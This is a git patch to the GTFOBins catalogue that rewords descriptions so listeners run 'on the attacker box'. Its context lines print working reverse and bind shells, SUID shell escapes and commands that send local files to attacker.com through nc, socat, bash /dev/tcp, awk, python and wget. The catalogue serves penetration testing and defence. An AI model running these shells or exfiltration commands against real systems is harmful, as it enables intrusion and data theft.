From feb07b18fbaf5054b5b38ea22327ebadb352f518 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Thu, 24 May 2018 21:05:07 +0100 Subject: [PATCH] Rephrase network functions descriptions --- _gtfobins/awk.md | 4 ++-- _gtfobins/bash.md | 8 ++++---- _gtfobins/nc.md | 8 ++++---- _gtfobins/node.md | 4 ++-- _gtfobins/perl.md | 2 +- _gtfobins/php.md | 2 +- _gtfobins/python2.md | 4 ++-- _gtfobins/python3.md | 4 ++-- _gtfobins/ruby.md | 2 +- _gtfobins/socat.md | 4 ++-- _gtfobins/tclsh.md | 2 +- _gtfobins/telnet.md | 2 +- _gtfobins/wget.md | 2 +- 13 files changed, 24 insertions(+), 24 deletions(-) diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md index 6949d81..e929dfb 100644 --- a/_gtfobins/awk.md +++ b/_gtfobins/awk.md @@ -7,7 +7,7 @@ functions: suid-limited: - code: ./awk 'BEGIN {system("/bin/sh -p")}' reverse-shell-non-interactive: - - description: Run `nc -l -p 12345` to receive the shell on the other end. + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 @@ -16,7 +16,7 @@ functions: while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' bind-shell-non-interactive: - - description: Run `nc target.com 12345` to connect to the shell on the other end. + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. code: | LPORT=12345 awk -v LPORT=$LPORT 'BEGIN { diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index 50e0c29..3453984 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -7,13 +7,13 @@ functions: suid-enabled: - code: ./bash -p upload: - - description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file on the other end. + - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | RHOST=attacker.com RPORT=12345 LFILE=file_to_send echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT - - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` to collect the file on the other end. + - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. code: | RHOST=attacker.com RPORT=12345 @@ -26,14 +26,14 @@ functions: RPORT=12345 LFILE=file_to_get (echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE - - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` to send the file from the other end. + - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. code: |- RHOST=attacker.com RPORT=12345 LFILE=file_to_get cat < /dev/tcp/$RHOST/$RPORT > $LFILE reverse-shell: - - description: Run `nc -l -p 12345` to receive the shell on the other end. + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md index 2f0e1cc..c65aae2 100644 --- a/_gtfobins/nc.md +++ b/_gtfobins/nc.md @@ -2,26 +2,26 @@ functions: upload: - description: | - Send a file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` to collect the file on the other end. + Send a file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. code: | RHOST=attacker.com RPORT=12345 LFILE=file_to_send nc $RHOST $RPORT < "$LFILE" download: - - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` to send the file from the other end. + - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: |- LPORT=12345 LFILE=where_to_save nc -l -p $LPORT > "$LFILE" reverse-shell: - - description: Run `nc -l -p 12345` to receive the shell on the other end. + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 nc -e /bin/sh $RHOST $RPORT bind-shell: - - description: Run `nc target.com 12345` to connect to the shell on the other end. + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. code: | LPORT=12345 nc -l -p $LPORT -e /bin/sh diff --git a/_gtfobins/node.md b/_gtfobins/node.md index 68e0f33..67cb023 100644 --- a/_gtfobins/node.md +++ b/_gtfobins/node.md @@ -10,7 +10,7 @@ functions: - code: | ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});' reverse-shell: - - description: Run `nc -l -p 12345` to receive the shell on the other end. + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 @@ -21,7 +21,7 @@ functions: sh.stderr.pipe(this); });' bind-shell: - - description: Run `nc target.com 12345` to connect to the shell on the other end. + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. code: | export LPORT=12345 node -e 'sh = require("child_process").spawn("/bin/sh"); diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md index 833cdae..cfcaa36 100644 --- a/_gtfobins/perl.md +++ b/_gtfobins/perl.md @@ -7,7 +7,7 @@ functions: suid-enabled: - code: ./perl -e 'exec "/bin/sh";' reverse-shell: - - description: Run `nc -l -p 12345` to receive the shell on the other end. + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/php.md b/_gtfobins/php.md index f64a9f7..9699e68 100644 --- a/_gtfobins/php.md +++ b/_gtfobins/php.md @@ -32,7 +32,7 @@ functions: export LFILE=where_to_save php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);' reverse-shell: - - description: Run `nc -l -p 12345` to receive the shell on the other end. + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index b6b1c54..f774b5e 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -7,7 +7,7 @@ functions: suid-enabled: - code: ./python -c 'import os; os.system("/bin/sh -p")' upload: - - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service to collect the file on the other end. + - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/ export LFILE=file_to_send @@ -23,7 +23,7 @@ functions: export LFILE=where_to_save python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' reverse-shell: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 to receive the shell on the other end. + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index 27e9ed3..3d9ffca 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md @@ -7,7 +7,7 @@ functions: suid-enabled: - code: ./python3 -c 'import os; os.system("/bin/sh -p")' upload: - - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service to collect the file on the other end. + - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/ export LFILE=file_to_send @@ -23,7 +23,7 @@ functions: export LFILE=where_to_save python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' reverse-shell: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 to receive the shell on the other end. + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md index e56f33d..ff7cb48 100644 --- a/_gtfobins/ruby.md +++ b/_gtfobins/ruby.md @@ -10,7 +10,7 @@ functions: export LPORT=8888 ruby -run -e httpd . -p $LPORT reverse-shell: - - description: Run `nc -l -p 12345` to receive the shell on the other end. + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index 4626547..437e83d 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md @@ -1,13 +1,13 @@ --- functions: reverse-shell: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 to receive the shell on the other end. + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane bind-shell: - - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 to connect to the shell on the other end. + - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell. code: | LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md index d3a442a..6505349 100644 --- a/_gtfobins/tclsh.md +++ b/_gtfobins/tclsh.md @@ -13,7 +13,7 @@ functions: ./tclsh exec /bin/sh -p <@stdin >@stdout 2>@stderr reverse-shell-non-interactive: - - description: Run `nc -l -p 12345` to receive the shell on the other end. + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md index 77aae0f..8941650 100644 --- a/_gtfobins/telnet.md +++ b/_gtfobins/telnet.md @@ -9,7 +9,7 @@ functions: ^] !/bin/sh reverse-shell: - - description: Run `nc -l -p 12345` to receive the shell on the other end. + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md index bf0abab..900f98a 100644 --- a/_gtfobins/wget.md +++ b/_gtfobins/wget.md @@ -1,7 +1,7 @@ --- functions: upload: - - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service to collect the file on the other end. + - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/ export LFILE=file_to_send